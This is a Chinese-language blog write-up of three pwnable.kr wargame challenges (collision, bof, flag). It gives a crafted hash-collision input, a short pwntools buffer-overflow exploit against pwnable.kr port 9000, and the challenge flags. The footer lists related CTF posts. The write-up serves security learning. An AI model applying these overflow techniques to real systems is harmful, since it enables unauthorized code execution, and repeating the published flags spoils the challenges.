pwnable.kr积累(一)

于 2020-05-23 18:39:10 发布
阅读量432 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Don2100/article/details/106210461
版权

collision

先连上

ssh col@pwnable.kr -p2222

看有什么文件

ls

有col ,col.c, flag三个文件,然后cat col.c,显示源代码

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
	int* ip = (int*)p;
	int i;
	int res=0;
	for(i=0; i<5; i++){
		res += ip[i];
	}
	return res;
}

int main(int argc, char* argv[]){
	if(argc<2){
		printf("usage : %s [passcode]\n", argv[0]);
		return 0;
	}
	if(strlen(argv[1]) != 20){
		printf("passcode length should be 20 bytes\n");
		return 0;
	}

	if(hashcode == check_password( argv[1] )){
		system("/bin/cat flag");
		return 0;
	}
	else
		printf("wrong passcode.\n");
	return 0;
}

从strlen(argv[1]) != 20 发现要输入20个字节,在check_password()中将20个字节以4个字节分隔,相加
取4个相同的数0x01010101,
有0x21DD09EC-0x01010101*4=0x1DD905E8
则输入的书是4个0x01010101+0x1DD905E8
因为读到内存时是小端模式,就是逆序,输入的应该是\xE8\x05\xD9\x1D
输入结果

./col ` python -c "print '\x01'*16+'\xE8\x05\xD9\x1D'"`

或者

./col $( python -c "print '\x01'*16+'\xE8\x05\xD9\x1D'")

知识点:反引号`和$()可以把一个命令的标准输出插在命令行中的任何位置,获取命令的结果,也就是python输出要加上两者中的一个。

bof

先把文件下载下来

wget http://pwnable.kr/bin/bof
wget http://pwnable.kr/bin/bof.c

用IDA分析一下,
在这里插入图片描述
a1地址是bp+8h,s地址是bp-2ch,相差52个字符,
输入结果 python

from pwn import *
key = p32(0xcafebabe)
c = remote("pwnable.kr", 9000)   
c.sendline('A' * 52 + key)
c.interactive()

得到flag:daddy, I just pwned a buFFer 😃

flag

先把文件下载下来

wget http://pwnable.kr/bin/flag

用IDA分析一下,发现string窗口中有UPX,即UPX加密。
用UPX -d -o 解密成flag_upx文件,再在IDA中分析一下
在这里插入图片描述
直接发现了flag,点进去
在这里插入图片描述
拿到flag:UPX…? sounds like a delivery service 😃

Don2100
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr-fix
r00tnb的博客
02-28 870
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include &amp;lt;stdio.h&amp;gt; // 23byte shellcode from http://shell-storm...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 929
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
Pwnable
03-26
Pwnable
Pwnable.kr
aoque9909的博客
04-16 193
Dragon —— 堆之 uaf 开始堆的学习之旅。   uaf漏洞利用到了堆的管理中fastbin的特性,关于堆的各种分配方式参见堆之*bin理解   在SecretLevel函数中,发现了隐藏的system("/bin/sh")调用,虽然无法直接执行,但无疑会是后续进展中的有力武器。   在和恐龙战斗的函数结束部分,发现了free掉但没有置空的free(dragon)语句,而...
pwnable.kr】fb
weixin_30785593的博客
06-29 161
这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇。 ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c,flag 首先下载fd.c 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <str...
pwnable.kr】cmd1
weixin_30413739的博客
07-10 106
最近的pwnable都是linux操作系统层面的。 ssh cmd1@pwnable.kr -p2222 (pw:guest) 首先还是下载源代码: #include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "...
Khatri-Rao积(KR积)
热门推荐
冬瓜班小朋友的博客
08-16 1万+
输入:A,B两个矩阵,要求两矩阵列数一致 输出:维度为(A行数*B行数)*列数的矩阵。 计算过程:A,B矩阵相同列做kron积运算,并逐列摆放组成结果矩阵。 举例: A=[1 2;3 4],B=[5 6;7 8] 其中AB均为2*2的矩阵,得到(2*2)*2=4*2的矩阵。 第一列:用A的第一列和B的第一列做kron积运算 [1*5=5 1*7=7 3*5=15 3*7=21]
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 644
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 572
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
pwnable.kr [input]
shisuan1的博客
12-02 251
pwnable.kr [input] Mom? how can I pass my input to a computer program? ssh input2@pwnable.kr -p2222 (pw:guest) input.c 的代码 #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;string.h&amp;gt
pwnable.kr---lotto
leeham的博客
11-08 392
pwnable.kr—lotto解题思路万万没想到这个题目的解题思路竟然是这样的!这个思路真的与我擦肩而过!根据下边的代码逻辑漏洞
pwnable.kr】 dragon
子曰小玖的博客
06-06 466
https://r00tnb.github.io/2018/02/27/pwnable.kr-dragon/ 前言 这道题找溢出找了半天,游戏也玩了半天,唉最后还是细心读代码找出了漏洞。这是一个c语言不同类型比较隐式转换导致的漏洞,还是有点意思的。 分析 放ida逆向一下,程序代码逻辑有点长,不过认真读的话还是能理解的。 1 2 3 4 5 6 7 8 9 10 11 12...
Pwnable.kr WP
AlexYoung28的博客
08-13 943
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
pwnable.kr-wtf
r00tnb的博客
07-26 828
前言 一道代码很简单,但是却花了我好长时间的题目。挺有意思的,考察输入缓冲区的。 分析 还是先分析代码 #!/usr/bin/python2 import os, sys, time import subprocess from threading import Timer TIME = 5 class MyTimer(): timer=None def __i...
pwnable.kr bof
潜心学习
07-04 1171
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
pwnable.kr-bof WP
Casuall的博客
03-24 5424
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
pwnable.kr】 note
子曰小玖的博客
06-10 787
查看了国外网友Hansoo1018的WriteUp,在此谢谢这位网友。 源代码中的select_menu()函数出现问题 问题出现在红色部分 select_menu()函数以递归方式调用。 如果要在屏幕上再次显示菜单,通常使用while语句或者其他代码完成。递归代码具有更清晰的特点,但是递归迭代越多,堆栈内存就越多。我试图在函数结束时调用Tail Call(Tail Re...
pwnable.kr】 blukat
子曰小玖的博客
06-06 449
https://blog.csdn.net/think_ycx/article/details/84405383 本关描述 这一关看着描述就挺奇怪的,scp下来之后居然把password改copy下来了,内容是cat: password: Permission denied。照理没有权限读的话是不会copy下来的。ssh上去看一下就明白了(如下图),当前用户在blukat_pwn组,因...
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
最新发布
05-30
好的,我可以为你提供一个基本的Python多线程爬虫程序,你可以根据自己的需求进行修改。 首先,你需要安装 requests, BeautifulSoup4, lxml 和 threading 这些库。 下面是程序代码: ```python import requests from bs4 import BeautifulSoup import threading def get_page(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') posts = soup.find_all('tr', class_='list1') for post in posts: title = post.find('td', class_='list_vspace').find('a', class_='list_title').text.strip() print(title) def main(): urls = ['https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999&page={}'.format(i) for i in range(1, 6)] threads = [] for url in urls: t = threading.Thread(target=get_page, args=(url,)) threads.append(t) t.start() for t in threads: t.join() if __name__ == '__main__': main() ``` 这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。同时,你也可以添加更多的代码来保存爬取的内容等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值